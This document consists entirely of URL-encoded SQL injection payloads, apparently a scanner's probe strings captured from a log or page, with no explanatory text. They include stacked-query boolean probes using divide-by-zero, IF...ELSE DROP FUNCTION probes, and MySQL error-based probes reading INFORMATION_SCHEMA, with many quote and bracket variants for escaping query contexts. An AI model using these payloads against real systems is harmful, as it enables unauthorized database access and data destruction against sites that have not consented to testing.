-3864%27%3B%20SELECT%20%28CASE%20WHEN%20%284385%3D3276%29%20THEN%204385%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27wHDP%27%3D%27wHDP -3773%27%29%3B%20SELECT%20%28CASE%20WHEN%20%284530%3D7090%29%20THEN%204530%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27DHQN%27%20LIKE%20%27DHQN -3830%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27VlAv%27%20LIKE%20%27VlAv -1375%27%29%3B%20SELECT%20%28CASE%20WHEN%20%289181%3D9401%29%20THEN%209181%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27rcDO%27%20LIKE%20%27rcDO -4532%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285417%3D7756%29%20THEN%205417%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27HRBC%27%20LIKE%20%27HRBC -8057%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27piBW%27%20LIKE%20%27piBW -6220%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281484%3D1438%29%20THEN%201484%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27cGVP%27%20LIKE%20%27cGVP -8148%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285734%3D7432%29%20THEN%205734%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27YERK%27%20LIKE%20%27YERK -7131%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27CTJb%27%20LIKE%20%27CTJb -2440%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285562%3D6360%29%20THEN%205562%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27YiIR%27%20LIKE%20%27YiIR -6956%27%3B%20SELECT%20%28CASE%20WHEN%20%281878%3D6414%29%20THEN%201878%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27qQzu%27%20LIKE%20%27qQzu -8252%27%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27jkKS%27%20LIKE%20%27jkKS -5793%27%3B%20SELECT%20%28CASE%20WHEN%20%289105%3D5184%29%20THEN%209105%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27IrtU%27%20LIKE%20%27IrtU -2399%22%29%3B%20SELECT%20%28CASE%20WHEN%20%281350%3D7266%29%20THEN%201350%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22yqSr%22%3D%22yqSr -3739%22%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22Jrnz%22%3D%22Jrnz -5865%22%29%3B%20SELECT%20%28CASE%20WHEN%20%289034%3D2927%29%20THEN%209034%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22CAZf%22%3D%22CAZf -8559%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282012%3D8158%29%20THEN%202012%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22vXOe%22%3D%22vXOe -5173%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22xZsb%22%3D%22xZsb -5646%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284266%3D9487%29%20THEN%204266%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22KxTh%22%3D%22KxTh -1029%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286997%3D7068%29%20THEN%206997%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22TRyC%22%3D%22TRyC -1050%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22jAbn%22%3D%22jAbn -9121%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281569%3D1485%29%20THEN%201569%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22IxeG%22%3D%22IxeG -9919%22%3B%20SELECT%20%28CASE%20WHEN%20%288803%3D2466%29%20THEN%208803%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22PniO%22%3D%22PniO -3611%22%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22DsTe%22%3D%22DsTe -4905%22%3B%20SELECT%20%28CASE%20WHEN%20%286478%3D2082%29%20THEN%206478%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22Ktnp%22%3D%22Ktnp -7364%22%29%3B%20SELECT%20%28CASE%20WHEN%20%285957%3D6134%29%20THEN%205957%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22KnYV%22%20LIKE%20%22KnYV -1569%22%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22jEOQ%22%20LIKE%20%22jEOQ -9611%22%29%3B%20SELECT%20%28CASE%20WHEN%20%282879%3D1101%29%20THEN%202879%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22FjGy%22%20LIKE%20%22FjGy -6311%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286191%3D6978%29%20THEN%206191%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22GonB%22%20LIKE%20%22GonB -2844%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22cKbW%22%20LIKE%20%22cKbW -2197%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281583%3D4162%29%20THEN%201583%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22YMJJ%22%20LIKE%20%22YMJJ -7742%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286069%3D6689%29%20THEN%206069%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22GZHs%22%20LIKE%20%22GZHs -7896%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22wsYM%22%20LIKE%20%22wsYM -3772%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289646%3D5731%29%20THEN%209646%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22FeFr%22%20LIKE%20%22FeFr -4429%22%3B%20SELECT%20%28CASE%20WHEN%20%283659%3D6662%29%20THEN%203659%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22PqLp%22%20LIKE%20%22PqLp -6332%22%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22WNtA%22%20LIKE%20%22WNtA -9231%22%3B%20SELECT%20%28CASE%20WHEN%20%281946%3D6385%29%20THEN%201946%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22RWDi%22%20LIKE%20%22RWDi -5303%29%20WHERE%204859%3D4859%3B%20SELECT%20%28CASE%20WHEN%20%284488%3D7894%29%20THEN%204488%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5084%29%20WHERE%209628%3D9628%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8378%29%20WHERE%204970%3D4970%3B%20SELECT%20%28CASE%20WHEN%20%287895%3D6802%29%20THEN%207895%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6234%27%29%20WHERE%209912%3D9912%3B%20SELECT%20%28CASE%20WHEN%20%285051%3D7620%29%20THEN%205051%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -4065%27%29%20WHERE%205106%3D5106%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6250%27%29%20WHERE%205906%3D5906%3B%20SELECT%20%28CASE%20WHEN%20%289298%3D7615%29%20THEN%209298%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5938%27%20WHERE%208708%3D8708%3B%20SELECT%20%28CASE%20WHEN%20%289723%3D1979%29%20THEN%209723%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -1273%27%20WHERE%206116%3D6116%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9740%27%20WHERE%209479%3D9479%3B%20SELECT%20%28CASE%20WHEN%20%288785%3D5763%29%20THEN%208785%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -3828%22%20WHERE%208175%3D8175%3B%20SELECT%20%28CASE%20WHEN%20%287991%3D5516%29%20THEN%207991%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6616%22%20WHERE%204778%3D4778%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -2948%22%20WHERE%203252%3D3252%3B%20SELECT%20%28CASE%20WHEN%20%288587%3D3907%29%20THEN%208587%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- 1%29%3B%20IF%285688%3D7701%29%20SELECT%205688%20ELSE%20DROP%20FUNCTION%20KsRY%3B-- 1%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%29%3B%20IF%288241%3D5144%29%20SELECT%208241%20ELSE%20DROP%20FUNCTION%20aQIB%3B-- 1%27%29%3B%20IF%287413%3D6734%29%20SELECT%207413%20ELSE%20DROP%20FUNCTION%20jQjt%3B-- 1%27%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%27%29%3B%20IF%285170%3D6706%29%20SELECT%205170%20ELSE%20DROP%20FUNCTION%20UkND%3B-- 1%27%3B%20IF%283172%3D4833%29%20SELECT%203172%20ELSE%20DROP%20FUNCTION%20jIzO%3B-- 1%27%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%27%3B%20IF%284125%3D9590%29%20SELECT%204125%20ELSE%20DROP%20FUNCTION%20Ewqr%3B-- 1%22%3B%20IF%282138%3D5791%29%20SELECT%202138%20ELSE%20DROP%20FUNCTION%20smiA%3B-- 1%22%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%22%3B%20IF%282604%3D3503%29%20SELECT%202604%20ELSE%20DROP%20FUNCTION%20cfZo%3B-- 1%29%3B%20IF%288806%3D3711%29%20SELECT%208806%20ELSE%20DROP%20FUNCTION%20mXwf%3B--%20AND%20%281095%3D1095 1%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%285216%3D5216 1%29%3B%20IF%286746%3D2437%29%20SELECT%206746%20ELSE%20DROP%20FUNCTION%20RDZT%3B--%20AND%20%283720%3D3720 1%29%29%3B%20IF%281990%3D6810%29%20SELECT%201990%20ELSE%20DROP%20FUNCTION%20YyQG%3B--%20AND%20%28%288189%3D8189 1%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%286138%3D6138 1%29%29%3B%20IF%284956%3D9865%29%20SELECT%204956%20ELSE%20DROP%20FUNCTION%20CukN%3B--%20AND%20%28%284516%3D4516 1%29%29%29%3B%20IF%285986%3D9029%29%20SELECT%205986%20ELSE%20DROP%20FUNCTION%20reol%3B--%20AND%20%28%28%289422%3D9422 1%29%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%285004%3D5004 1%29%29%29%3B%20IF%283818%3D8511%29%20SELECT%203818%20ELSE%20DROP%20FUNCTION%20iJDg%3B--%20AND%20%28%28%283152%3D3152 1%3B%20IF%285367%3D2394%29%20SELECT%205367%20ELSE%20DROP%20FUNCTION%20WgqO%3B-- 1%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%3B%20IF%283011%3D1501%29%20SELECT%203011%20ELSE%20DROP%20FUNCTION%20SbIo%3B-- 1%27%29%3B%20IF%285268%3D7177%29%20SELECT%205268%20ELSE%20DROP%20FUNCTION%20hbbK%3B--%20AND%20%28%27pCTI%27%3D%27pCTI 1%27%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%27Ucol%27%3D%27Ucol 1%27%29%3B%20IF%284820%3D9384%29%20SELECT%204820%20ELSE%20DROP%20FUNCTION%20MyuP%3B--%20AND%20%28%27Wlsb%27%3D%27Wlsb 1%27%29%29%3B%20IF%281690%3D2574%29%20SELECT%201690%20ELSE%20DROP%20FUNCTION%20Rohy%3B--%20AND%20%28%28%27KqPK%27%3D%27KqPK 1%27%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%27ZIVD%27%3D%27ZIVD 1%27%29%29%3B%20IF%284816%3D9471%29%20SELECT%204816%20ELSE%20DROP%20FUNCTION%20MpDH%3B--%20AND%20%28%28%27uHAn%27%3D%27uHAn 1%27%29%29%29%3B%20IF%287310%3D1134%29%20SELECT%207310%20ELSE%20DROP%20FUNCTION%20MFMF%3B--%20AND%20%28%28%28%27DUgx%27%3D%27DUgx 1%27%29%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%28%27PioM%27%3D%27PioM 1%27%29%29%29%3B%20IF%282208%3D5658%29%20SELECT%202208%20ELSE%20DROP%20FUNCTION%20SOSu%3B--%20AND%20%28%28%28%27Qfsa%27%3D%27Qfsa 1%27%3B%20IF%284439%3D7088%29%20SELECT%204439%20ELSE%20DROP%20FUNCTION%20HfxG%3B--%20AND%20%27mssZ%27%3D%27mssZ 1%27%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%27ntWS%27%3D%27ntWS 1%27%3B%20IF%288179%3D2044%29%20SELECT%208179%20ELSE%20DROP%20FUNCTION%20LhMh%3B--%20AND%20%27Jsbp%27%3D%27Jsbp 1%27%29%3B%20IF%289449%3D6323%29%20SELECT%209449%20ELSE%20DROP%20FUNCTION%20uePE%3B--%20AND%20%28%27XpIv%27%20LIKE%20%27XpIv 1%27%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%27wSWV%27%20LIKE%20%27wSWV 1%27%29%3B%20IF%288568%3D9192%29%20SELECT%208568%20ELSE%20DROP%20FUNCTION%20uIGc%3B--%20AND%20%28%27JqLI%27%20LIKE%20%27JqLI 1%27%29%29%3B%20IF%287947%3D2440%29%20SELECT%207947%20ELSE%20DROP%20FUNCTION%20VyRu%3B--%20AND%20%28%28%27EEkE%27%20LIKE%20%27EEkE 1%27%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%27nTFI%27%20LIKE%20%27nTFI 1%27%29%29%3B%20IF%287861%3D1799%29%20SELECT%207861%20ELSE%20DROP%20FUNCTION%20akxd%3B--%20AND%20%28%28%27pTLr%27%20LIKE%20%27pTLr 1%27%29%29%29%3B%20IF%284783%3D6262%29%20SELECT%204783%20ELSE%20DROP%20FUNCTION%20RAXf%3B--%20AND%20%28%28%28%27oSow%27%20LIKE%20%27oSow 1%27%29%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%28%27TTAc%27%20LIKE%20%27TTAc 1%27%29%29%29%3B%20IF%283872%3D8520%29%20SELECT%203872%20ELSE%20DROP%20FUNCTION%20HuIz%3B--%20AND%20%28%28%28%27aede%27%20LIKE%20%27aede 1%27%3B%20IF%289445%3D5669%29%20SELECT%209445%20ELSE%20DROP%20FUNCTION%20ADUn%3B--%20AND%20%27qFra%27%20LIKE%20%27qFra 1%27%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%27PPww%27%20LIKE%20%27PPww 1%27%3B%20IF%283358%3D2331%29%20SELECT%203358%20ELSE%20DROP%20FUNCTION%20tOvJ%3B--%20AND%20%27bdyG%27%20LIKE%20%27bdyG 1%22%29%3B%20IF%282098%3D7612%29%20SELECT%202098%20ELSE%20DROP%20FUNCTION%20Wwub%3B--%20AND%20%28%22KFsC%22%3D%22KFsC 1%22%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%22sBTw%22%3D%22sBTw 1%22%29%3B%20IF%287320%3D4937%29%20SELECT%207320%20ELSE%20DROP%20FUNCTION%20xmwo%3B--%20AND%20%28%22nVsF%22%3D%22nVsF 1%22%29%29%3B%20IF%282245%3D5104%29%20SELECT%202245%20ELSE%20DROP%20FUNCTION%20yriy%3B--%20AND%20%28%28%22BPDO%22%3D%22BPDO 1%22%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%22cLQr%22%3D%22cLQr 1%22%29%29%3B%20IF%284316%3D3971%29%20SELECT%204316%20ELSE%20DROP%20FUNCTION%20nQjB%3B--%20AND%20%28%28%22GeSD%22%3D%22GeSD 1%22%29%29%29%3B%20IF%281829%3D6908%29%20SELECT%201829%20ELSE%20DROP%20FUNCTION%20ELNe%3B--%20AND%20%28%28%28%22fRAF%22%3D%22fRAF 1%22%29%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%28%22YZZr%22%3D%22YZZr 1%22%29%29%29%3B%20IF%283332%3D4920%29%20SELECT%203332%20ELSE%20DROP%20FUNCTION%20dkJy%3B--%20AND%20%28%28%28%22ZYug%22%3D%22ZYug 1%22%3B%20IF%282901%3D5691%29%20SELECT%202901%20ELSE%20DROP%20FUNCTION%20DOzq%3B--%20AND%20%22sMeO%22%3D%22sMeO 1%22%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%22TfWR%22%3D%22TfWR 1%22%3B%20IF%286691%3D4075%29%20SELECT%206691%20ELSE%20DROP%20FUNCTION%20WiNA%3B--%20AND%20%22JGAo%22%3D%22JGAo 1%22%29%3B%20IF%282372%3D3986%29%20SELECT%202372%20ELSE%20DROP%20FUNCTION%20eQhC%3B--%20AND%20%28%22XLVa%22%20LIKE%20%22XLVa 1%22%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%22aUJM%22%20LIKE%20%22aUJM 1%22%29%3B%20IF%284940%3D8553%29%20SELECT%204940%20ELSE%20DROP%20FUNCTION%20BCWs%3B--%20AND%20%28%22AfcZ%22%20LIKE%20%22AfcZ 1%22%29%29%3B%20IF%287684%3D4650%29%20SELECT%207684%20ELSE%20DROP%20FUNCTION%20jzcK%3B--%20AND%20%28%28%22jxEJ%22%20LIKE%20%22jxEJ 1%22%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%22ldLi%22%20LIKE%20%22ldLi 1%22%29%29%3B%20IF%288825%3D1979%29%20SELECT%208825%20ELSE%20DROP%20FUNCTION%20ZhFy%3B--%20AND%20%28%28%22zivU%22%20LIKE%20%22zivU 1%22%29%29%29%3B%20IF%284329%3D2051%29%20SELECT%204329%20ELSE%20DROP%20FUNCTION%20XkNs%3B--%20AND%20%28%28%28%22noiG%22%20LIKE%20%22noiG 1%22%29%29%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%28%28%28%22tpaz%22%20LIKE%20%22tpaz 1%22%29%29%29%3B%20IF%286803%3D8133%29%20SELECT%206803%20ELSE%20DROP%20FUNCTION%20tCbC%3B--%20AND%20%28%28%28%22Pyhr%22%20LIKE%20%22Pyhr 1%22%3B%20IF%286104%3D1912%29%20SELECT%206104%20ELSE%20DROP%20FUNCTION%20iEXm%3B--%20AND%20%22GHGC%22%20LIKE%20%22GHGC 1%22%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20AND%20%22unjW%22%20LIKE%20%22unjW 1%22%3B%20IF%288340%3D4254%29%20SELECT%208340%20ELSE%20DROP%20FUNCTION%20EZiI%3B--%20AND%20%22QABr%22%20LIKE%20%22QABr 1%29%20WHERE%208966%3D8966%3B%20IF%288293%3D7874%29%20SELECT%208293%20ELSE%20DROP%20FUNCTION%20dTgf%3B-- 1%29%20WHERE%208677%3D8677%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%29%20WHERE%201172%3D1172%3B%20IF%282514%3D9652%29%20SELECT%202514%20ELSE%20DROP%20FUNCTION%20DMUA%3B-- 1%27%29%20WHERE%206651%3D6651%3B%20IF%281658%3D2757%29%20SELECT%201658%20ELSE%20DROP%20FUNCTION%20ZXUg%3B-- 1%27%29%20WHERE%202299%3D2299%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%27%29%20WHERE%206401%3D6401%3B%20IF%283412%3D7199%29%20SELECT%203412%20ELSE%20DROP%20FUNCTION%20dzup%3B-- 1%27%20WHERE%203295%3D3295%3B%20IF%289980%3D4390%29%20SELECT%209980%20ELSE%20DROP%20FUNCTION%20rKCD%3B-- 1%27%20WHERE%208068%3D8068%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%27%20WHERE%208737%3D8737%3B%20IF%283241%3D2785%29%20SELECT%203241%20ELSE%20DROP%20FUNCTION%20CGDU%3B-- 1%22%20WHERE%202874%3D2874%3B%20IF%285300%3D1177%29%20SELECT%205300%20ELSE%20DROP%20FUNCTION%20LRxK%3B-- 1%22%20WHERE%208564%3D8564%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B-- 1%22%20WHERE%202147%3D2147%3B%20IF%288511%3D4643%29%20SELECT%208511%20ELSE%20DROP%20FUNCTION%20YaqP%3B-- 1%27%20%7C%7C%20%28SELECT%204070%20FROM%20DUAL%20WHERE%202510%3D2510%3B%20IF%282877%3D8864%29%20SELECT%202877%20ELSE%20DROP%20FUNCTION%20SyHe%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206445%20FROM%20DUAL%20WHERE%206694%3D6694%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201349%20FROM%20DUAL%20WHERE%203182%3D3182%3B%20IF%281857%3D1642%29%20SELECT%201857%20ELSE%20DROP%20FUNCTION%20XksG%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201051%20WHERE%203683%3D3683%3B%20IF%285175%3D7876%29%20SELECT%205175%20ELSE%20DROP%20FUNCTION%20UGXo%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207717%20WHERE%207999%3D7999%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204979%20WHERE%201692%3D1692%3B%20IF%287647%3D7601%29%20SELECT%207647%20ELSE%20DROP%20FUNCTION%20WpGi%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209036%20FROM%20DUAL%20WHERE%207563%3D7563%3B%20IF%284527%3D2097%29%20SELECT%204527%20ELSE%20DROP%20FUNCTION%20Pnyb%3B--%20%29 1%20%2B%20%28SELECT%202770%20FROM%20DUAL%20WHERE%207082%3D7082%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20%29 1%20%2B%20%28SELECT%204920%20FROM%20DUAL%20WHERE%206322%3D6322%3B%20IF%284969%3D2430%29%20SELECT%204969%20ELSE%20DROP%20FUNCTION%20oJip%3B--%20%29 1%20%2B%20%28SELECT%202971%20WHERE%208838%3D8838%3B%20IF%282592%3D9641%29%20SELECT%202592%20ELSE%20DROP%20FUNCTION%20cMuw%3B--%20%29 1%20%2B%20%28SELECT%204807%20WHERE%207910%3D7910%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20%29 1%20%2B%20%28SELECT%201096%20WHERE%206947%3D6947%3B%20IF%285295%3D2820%29%20SELECT%205295%20ELSE%20DROP%20FUNCTION%20uJAD%3B--%20%29 1%27%20%2B%20%28SELECT%20%27JQOg%27%20FROM%20DUAL%20WHERE%208135%3D8135%3B%20IF%286860%3D6014%29%20SELECT%206860%20ELSE%20DROP%20FUNCTION%20GGir%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27TXzb%27%20FROM%20DUAL%20WHERE%202047%3D2047%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27XcVz%27%20FROM%20DUAL%20WHERE%208569%3D8569%3B%20IF%283944%3D6135%29%20SELECT%203944%20ELSE%20DROP%20FUNCTION%20lNEW%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27afLY%27%20WHERE%209330%3D9330%3B%20IF%282227%3D3444%29%20SELECT%202227%20ELSE%20DROP%20FUNCTION%20NyKo%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27XHai%27%20WHERE%204556%3D4556%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27skOa%27%20WHERE%201372%3D1372%3B%20IF%284179%3D5799%29%20SELECT%204179%20ELSE%20DROP%20FUNCTION%20Vpwe%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%283725%3D6247%29%20SELECT%203725%20ELSE%20DROP%20FUNCTION%20yDtd%3B--%20%23 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%285881%3D5881%29%20SELECT%205881%20ELSE%20DROP%20FUNCTION%20FHgW%3B--%20%23 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%285103%3D1844%29%20SELECT%205103%20ELSE%20DROP%20FUNCTION%20uDsA%3B--%20%23 1%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%27%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%27%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%22%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 